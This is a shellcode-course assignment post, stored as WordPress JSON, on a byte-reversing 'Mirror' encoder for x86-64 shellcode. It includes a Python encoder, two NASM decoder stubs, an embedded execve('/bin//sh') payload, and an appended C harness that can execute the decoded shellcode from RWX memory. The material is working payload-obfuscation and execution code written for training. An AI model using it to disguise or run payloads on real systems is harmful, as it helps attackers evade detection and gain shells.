{"id":210,"date":"2018-02-25T11:40:32","date_gmt":"2018-02-25T10:40:32","guid":{"rendered":"http:\/\/pentester.blog\/?p=210"},"modified":"2019-08-18T19:48:26","modified_gmt":"2019-08-18T17:48:26","slug":"slae64-assignment-4-encoder-decoder-shellcode","status":"publish","type":"post","link":"https:\/\/hacktarus.fr\/?p=210","title":{"rendered":"SLAE64 &#8211; Assignment #4 &#8211; Encoder\/Decoder Shellcode"},"content":{"rendered":"<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:<\/p>\n<p>http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html<\/p>\n<p>Student ID: PA-6470<\/p>\n<h2>Assignment #4<\/h2>\n<p>The aim of this assignment is to write a custom shellcode encoder and decoder.<\/p>\n<p>The first thing to do is to dump all the bytes (opcodes) of the shellcode and think of a way to scramble them.<\/p>\n<p>Here I&rsquo;ve chosen a simple but effective algorithm. The encoder swaps the first and last byte, then the second and the second-to-last, and keeps swapping pairs until it reaches the middle; the result is simply the shellcode in reverse byte order. Since a swap is its own inverse, the decoder runs exactly the same loop. My implementation only works if there is an even number of bytes (with an odd count the Python encoder below skips the middle byte). If not, you just need to add one dummy byte such as a NOP (0x90) before encoding. 
I&rsquo;ve called this encoder the \u00ab\u00a0Mirror Encoder\u00a0\u00bb.<\/p>\n<p>Here is a simple diagram showing how this algorithm works:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-282\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/02\/Mirror-Encoding-2.png\" alt=\"\" width=\"591\" height=\"221\" \/><\/p>\n<h2>Encoder<\/h2>\n<p>Here is a screenshot of the encoder running and the encoded shellcode it produces:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-225\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/02\/slae64-4-1bis.png\" alt=\"\" width=\"1364\" height=\"252\" \/><\/p>\n<p>Mirror-Encoder.py (Python 3; the original script was written for Python 2):<\/p>\n<pre>#!\/usr\/bin\/env python3\r\n\r\n# This shellcode encoder has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :\r\n# http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html\r\n#\r\n# Author : SLAE64-PA-6470 (kahlon81)\r\n\r\n# python3 Mirror-Encoder.py\r\n\r\n# execve(\"\/bin\/\/sh\") shellcode to encode (32 bytes, no NUL)\r\nshellcode = (b\"\\x48\\x31\\xc0\\x50\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x53\\x48\\x89\\xe7\\x50\\x48\\x89\\xe2\\x57\\x48\\x89\\xe6\\x48\\x83\\xc0\\x3b\\x0f\\x05\")\r\n\r\narr = bytearray(shellcode)\r\nprint('Len: %d' % len(arr))\r\n\r\n# The mirror swap needs an even number of bytes: pad with a NOP first.\r\nif len(arr) % 2:\r\n    raise SystemExit('odd length: append a dummy byte (e.g. a NOP, 0x90) before encoding')\r\n\r\n# Pair byte i with its mirror byte len-1-i, up to the middle\r\narr2 = [(arr[i], arr[-i-1]) for i in range(len(arr) \/\/ 2)]\r\n\r\nr2 = \"\"    # left half, emitted in reverse order\r\nl2 = \"\"    # right half, walked from the end\r\nrr2 = \"\"\r\nll2 = \"\"\r\n\r\nfor left, right in arr2:\r\n    # encode for C\r\n    r2 = '\\\\x%02x' % left + r2\r\n    l2 = l2 + '\\\\x%02x' % right\r\n\r\n    # encode for ASM\r\n    rr2 = '0x%02x,' % left + rr2\r\n    ll2 = ll2 + '0x%02x,' % right\r\n\r\n# Build encoded strings: right half reversed, then left half reversed,\r\n# i.e. the whole shellcode in reverse byte order\r\nencoded = l2 + r2\r\nencoded2 = (ll2 + rr2).rstrip(',')\r\n\r\nprint('Encoded shellcode ...')\r\nprint('opcodes for C :')\r\nprint(encoded)\r\nprint('opcodes for ASM :')\r\nprint(encoded2)\r\n<\/pre>\n<h2>Decoder<\/h2>\n<p>The decoder is written in assembly and just does the same swap again: swapping byte i with byte n-1-i is its own inverse, so the decoder needs no key and no table, only the length.<\/p>\n<p>Here is a screenshot of the running decoder. It decodes the previously encoded shellcode and runs it:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-226\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/02\/slae64-4-2.png\" alt=\"\" width=\"1180\" height=\"182\" \/><\/p>\n<p>The code is self-explanatory; two versions are available. Both overwrite the encoded buffer in place and then jump into it, so the buffer must live in memory that is writable and executable at the same time (when testing from a C harness, for instance, copy it into an RWX region obtained from mmap). Note also that mov rdx, SC_SIZE - 1 and mov r9, SC_SIZE are assembled with 32-bit immediates, so the stub itself contains zero bytes; check it with objdump -d and, if the delivery path is NUL-sensitive, zero the register first and load the count through its 8-bit half (xor edx, edx then mov dl, SC_SIZE - 1).<\/p>\n<p>Full source code is available here and on my <a href=\"https:\/\/github.com\/kahlon81\/SLAE64\">Github<\/a> account.<\/p>\n<h3>Version 1<\/h3>\n<pre>; This shellcode decoder has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :\r\n; http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html\r\n;\r\n; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; $ nasm -f elf64 Mirror-Decoder.nasm -o Mirror-Decoder.o\r\n; $ ld Mirror-Decoder.o -o Mirror-Decoder\r\n\r\nglobal _start\r\n\r\nsection .data\r\nencoded_sc:\tdb 0x05,0x0f,0x3b,0xc0,0x83,0x48,0xe6,0x89,0x48,0x57,0xe2,0x89,0x48,0x50,0xe7,0x89,0x48,0x53,0x68,0x73,0x2f,0x2f,0x6e,0x69,0x62,0x2f,0xbb,0x48,0x50,0xc0,0x31,0x48\r\nencoded_sc_size equ $ - encoded_sc\r\n\r\nsection .text\r\n_start:\r\n\tlea r8, [rel encoded_sc]     ; r8 = address of the encoded shellcode\r\n\txor rcx, rcx                 ; rcx = offset of the first SC byte\r\n\tmov rdx, encoded_sc_size - 1 ; rdx = offset of the last SC byte\r\n\tmov r9, encoded_sc_size      ; r9 = SC size \/ 2 = number of swaps\r\n\tshr r9, 1\r\ndecode:\r\n\tcmp rcx, r9                  ; stop swapping when we reach the middle\r\n\tje encoded_sc                ; jump to the decoded shellcode\r\n\r\n\tmov al, byte [r8+rcx]        ; save both values\r\n\tmov bl, byte [r8+rdx]\r\n\r\n\tmov byte [r8+rcx], bl        ; swap them\r\n\tmov byte [r8+rdx], al\r\n\r\n\tinc rcx                      ; next byte from the left\r\n\tdec rdx                      ; next byte from the right\r\n\tjmp short decode\r\n<\/pre>\n<h3>Version 2 (JUMP-CALL-POP)<\/h3>\n<p>This version gets the address of the encoded bytes with the JMP-CALL-POP trick instead of a RIP-relative lea: the call pushes the address of the instruction that follows it, which is the first encoded byte, and pop r8 retrieves it. The stub therefore never needs to know where it is loaded.<\/p>\n<pre>; This shellcode decoder has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :\r\n; http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html\r\n;\r\n; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; $ nasm -f elf64 Mirror-Decoder.nasm -o Mirror-Decoder.o\r\n; $ ld Mirror-Decoder.o -o Mirror-Decoder\r\n\r\nglobal _start\r\n\r\nsection .text\r\n_start:\r\n\tjmp call_decoder\r\ndecoder:\r\n\tpop r8                       ; r8 = address of SC, pushed by the call below\r\n\txor rcx, rcx                 ; rcx = offset of the first SC byte\r\n\tmov rdx, SC_SIZE - 1         ; rdx = offset of the last SC byte\r\n\tmov r9, SC_SIZE              ; r9 = SC size \/ 2 = number of swaps\r\n\tshr r9, 1\r\ndecode:\r\n\tcmp rcx, r9                  ; stop swapping when we reach the middle\r\n\tje SC                        ; jump to the decoded shellcode\r\n\r\n\tmov al, byte [r8+rcx]        ; save both values\r\n\tmov bl, byte [r8+rdx]\r\n\r\n\tmov byte [r8+rcx], bl        ; swap them\r\n\tmov byte [r8+rdx], al\r\n\r\n\tinc rcx                      ; next byte from the left\r\n\tdec rdx                      ; next byte from the right\r\n\tjmp short decode\r\n\r\nsection .data\r\ncall_decoder:\r\n\tcall decoder\r\nSC:\tdb 0x05,0x0f,0x3b,0xc0,0x83,0x48,0xe6,0x89,0x48,0x57,0xe2,0x89,0x48,0x50,0xe7,0x89,0x48,0x53,0x68,0x73,0x2f,0x2f,0x6e,0x69,0x62,0x2f,0xbb,0x48,0x50,0xc0,0x31,0x48\r\nSC_SIZE equ $ - SC\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html Student ID: PA-6470 Assignment #4 The aim of this assignment is to write a custom shellcode encoder and decoder. The first thing to do is to dump all the bytes (opcodes) of the shellcode and think of &hellip; <a href=\"https:\/\/hacktarus.fr\/?p=210\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SLAE64 &#8211; Assignment #4 &#8211; Encoder\/Decoder Shellcode<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-210","post","type-post","status-publish","format-standard","hentry","category-slae64"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/210","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=210"}],"version-history":[{"count":12,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/210\/revisions"}],"predecessor-version":[{"id":299,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/210\/revisions\/299"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=210"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=210"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ft
ags&post=210"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
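The Mirror encoder and the decoder loop of the NASM stub, as a C test harness for the post above. This is an added example, not code from the post or from the author's repository: the only input it takes from the post is the 32-byte execve("/bin//sh") shellcode; the function names (mirror_swap, mirror_encode, mirror_roundtrip_ok, run_decoded), the 0x90 pad for odd lengths (the post's "add a NOP" advice made concrete) and the --run flag are this example's own assumptions.

```c
/*
 * Added example (not the post's code): Mirror encode/decode in C, so the
 * round trip can be checked on the host before the NASM stub goes into
 * a payload.  Function names and the 0x90 pad are this example's choices.
 *
 * Build: gcc -O2 -Wall -o mirror mirror.c
 * Run:   ./mirror          encode, decode, verify, print both formats
 *        ./mirror --run    also execute the decoded payload (spawns a shell)
 */
#define _GNU_SOURCE
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

#define NOP 0x90  /* padding byte for odd-length input */

/* execve("/bin//sh") shellcode from the post (32 bytes, no NUL). */
static const uint8_t shellcode[] =
    "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48"
    "\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* The decoder loop of the NASM stub: one index walks up from 0, the other
 * down from len-1, and they stop at the middle.  The swap is its own
 * inverse, so this one loop both encodes and decodes. */
void mirror_swap(uint8_t *buf, size_t len)
{
    for (size_t lo = 0, hi = len - 1; lo < len / 2; lo++, hi--) {
        uint8_t t = buf[lo];
        buf[lo] = buf[hi];
        buf[hi] = t;
    }
}

/* Encoder: pad an odd-length input with one NOP, then mirror it.
 * Returns the encoded length, or 0 if dst is too small. */
size_t mirror_encode(const uint8_t *src, size_t n, uint8_t *dst, size_t cap)
{
    size_t len = n + (n & 1);
    if (len == 0 || len > cap)
        return 0;
    memcpy(dst, src, n);
    if (n & 1)
        dst[n] = NOP;
    mirror_swap(dst, len);
    return len;
}

/* Mirroring only reorders bytes, so the encoded payload has exactly the
 * byte set of the input: it can neither introduce nor remove a NUL. */
int has_nul(const uint8_t *buf, size_t len)
{
    return memchr(buf, 0, len) != NULL;
}

/* Encode, decode, and compare with the input (plus the pad, if any).
 * Returns 1 on a clean round trip, 0 otherwise. */
int mirror_roundtrip_ok(const uint8_t *src, size_t n)
{
    uint8_t enc[256], dec[256];
    size_t len = mirror_encode(src, n, enc, sizeof enc);
    if (len == 0)
        return 0;
    memcpy(dec, enc, len);
    mirror_swap(dec, len);                 /* what the stub does at run time */
    if (memcmp(dec, src, n) != 0)
        return 0;
    return len == n || dec[n] == NOP;
}

/* Print the two formats the post's Python encoder emits. */
void print_encoded(const uint8_t *buf, size_t len)
{
    printf("opcodes for C :\n");
    for (size_t i = 0; i < len; i++)
        printf("\\x%02x", buf[i]);
    printf("\nopcodes for ASM :\n");
    for (size_t i = 0; i < len; i++)
        printf("0x%02x%s", buf[i], i + 1 < len ? "," : "\n");
}

/* Decode and execute.  The stub writes the decoded bytes over the buffer
 * and then jumps into it, so the buffer must be writable AND executable;
 * a read-only .text page or a non-executable stack fails on one step. */
int run_decoded(const uint8_t *enc, size_t len)
{
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;
    memcpy(mem, enc, len);
    mirror_swap(mem, len);
    ((void (*)(void))mem)();               /* execve does not return */
    return 0;
}

int main(int argc, char **argv)
{
    uint8_t enc[64];
    size_t len = mirror_encode(shellcode, SHELLCODE_LEN, enc, sizeof enc);
    printf("Len: %zu\n", len);
    print_encoded(enc, len);
    printf("round trip: %s, NUL-free: %s\n",
           mirror_roundtrip_ok(shellcode, SHELLCODE_LEN) ? "ok" : "FAILED",
           has_nul(enc, len) ? "no" : "yes");
    if (argc > 1 && strcmp(argv[1], "--run") == 0)
        return run_decoded(enc, len);
    return 0;
}
```

Without --run the program only encodes, decodes and compares; with --run it copies the encoded bytes into an RWX mapping, decodes them in place and jumps to them, which is the same write-then-execute requirement the NASM stub puts on its .data buffer. The has_nul check is deliberately run on the payload only: since mirroring is a permutation it cannot change the byte set, so the bytes to worry about in a NUL-sensitive delivery path are the ones in the decoder stub's own instructions, not in the mirrored data.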